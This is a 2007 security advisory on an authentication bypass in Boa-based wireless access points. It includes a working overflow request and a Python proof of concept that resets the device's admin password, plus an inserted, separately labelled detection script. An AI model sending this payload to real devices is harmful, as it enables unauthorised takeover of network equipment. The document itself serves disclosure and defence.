Boa (with Intersil Extensions) - HTTP Basic Authentication Bypass
Secure Network - Security Research Advisory
Vuln name: HTTP Basic Authentication Bypass
Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (i.e.
FreeLan 802.11g Wireless Access Point (RO80211G-AP))
Severity: High
Local/Remote: Remote
Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net -
http://www.roper-europe.com
Author(s): Luca "ikki" Carettoni - luca.carettoni@xxxxxxxxxxxxxxxx, Claudio
"paper" Merloni - claudio.merloni@xxxxxxxxxxxxxxxx
Vendor disclosure: 24th August 2007
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 10th September 2007
Advisory number: SN-2007-02
Advisory URL: http://www.securenetwork.it/advisories/
*** SUMMARY ***
Boa is a single-tasking HTTP server. That means that, unlike traditional web
servers, it does not fork for each incoming connection, nor does it fork many
copies of itself to handle multiple connections.
Boa has very low hardware requirements and is therefore used on many embedded
systems, including routers, wireless access points and portable devices.
The Intersil isl3893 is an ARM9 system-on-chip for wireless access points. The
goal of the isl3893 project is to provide an embedded distribution built around
uClibc and uClinux.
It is possible to overwrite the "admin" password in memory, thus allowing an
attacker to gain access to the web interface and alter configuration
parameters. This vulnerability can be combined with another known vulnerability
(CVE-2000-0920) to read arbitrary files from the device filesystem.
It is important to note that Boa httpd has no authentication code built in; the
flaw is presumably located in the Intersil extensions, but this cannot be
confirmed because no source code has been released.
*** VULNERABILITY DETAILS ***
When prompted for HTTP Basic authentication credentials, it is possible to
overflow the stack of the boa process by passing a string longer than 127
characters as the username. In that situation the string passed as the password
overwrites the in-memory value of the admin password, allowing the attacker to
reset it to a known value. Once the password has been reset, the attacker has
access to the configuration panel.
As an example, the password can be set to "owned" by sending the following
request to the web server:
GET / HTTP/1.1
Host: 192.168.0.1
Authorization: Basic
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYTpvd25lZA==
The value of the Basic Authorization header is the base64 (MIME) encoding of
the string
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned"
*** EXPLOIT ***
The vulnerability can be exploited with a single HTTP request, e.g. from a
common web browser (entering the credentials specified above at the
authentication prompt).
The following snippet of Python code reproduces the issue:
###### CUT HERE ######
#!/usr/bin/env python
# Python 2 proof of concept (urllib2): sends the overlong username together
# with the new password as HTTP Basic credentials.
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME = \
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
# The realm must match the one in the device's 401 challenge, otherwise
# urllib2 will not send the credentials.
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
                          SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
# Fetching a protected page triggers the authentication round trip.
res = urllib2.urlopen('http://' + SERVER_IP_ADDRESS + '/home/index.shtml')
###### CUT HERE ######
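A defender-side check for the request pattern described in the two sections above, added here as an example and not part of the advisory or of Boa: it decodes the Basic credentials from each request's Authorization header and flags any username longer than the 127-character limit the advisory gives, so a proxy, IDS rule or log review can spot the pattern. The sample requests are constructed.

```python
# Added example (not from the advisory): flag requests whose HTTP Basic
# username exceeds the 127-character limit the advisory describes.
# Sample requests below are constructed for illustration.
import base64
import binascii

MAX_USERNAME_LEN = 127  # longest username the affected code handles safely


def parse_basic_credentials(auth_header):
    """Return (username, password) bytes from a 'Basic <base64>' header
    value, or None if the header is missing, not Basic, or undecodable."""
    if not auth_header:
        return None
    scheme, _, token = auth_header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    # RFC 7617: the user-id is everything before the first colon.
    user, sep, password = decoded.partition(b":")
    return (user, password) if sep else None


def find_oversized_usernames(requests, limit=MAX_USERNAME_LEN):
    """Return [(index, username_length)] for each request (dict of headers)
    whose Basic-auth username is longer than `limit` bytes."""
    hits = []
    for i, headers in enumerate(requests):
        creds = parse_basic_credentials(headers.get("Authorization"))
        if creds is not None and len(creds[0]) > limit:
            hits.append((i, len(creds[0])))
    return hits


# Constructed samples: a normal 'admin:admin' login, a malformed header,
# and the overflow pattern from the advisory (128 'a's, then ':owned').
SAMPLE_REQUESTS = [
    {"Host": "192.168.0.1", "Authorization": "Basic YWRtaW46YWRtaW4="},
    {"Host": "192.168.0.1", "Authorization": "Basic not-base64!!"},
    {"Host": "192.168.0.1", "Authorization": "Basic "
     + base64.b64encode(b"a" * 128 + b":owned").decode("ascii")},
]

if __name__ == "__main__":
    for idx, length in find_oversized_usernames(SAMPLE_REQUESTS):
        print(f"request {idx}: username of {length} bytes exceeds {MAX_USERNAME_LEN}")
```

Malformed or non-Basic headers are skipped rather than treated as hits, so the check can run over raw proxy logs without false alarms from other schemes.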
*** FIX INFORMATION ***
N/A
*** WORKAROUNDS ***
N/A
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.
This advisory is copyright © 2007 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and the like, provided that due credit is given to Secure Network.
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork@xxxxxxxxxxxxxxxx
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 0363 560 404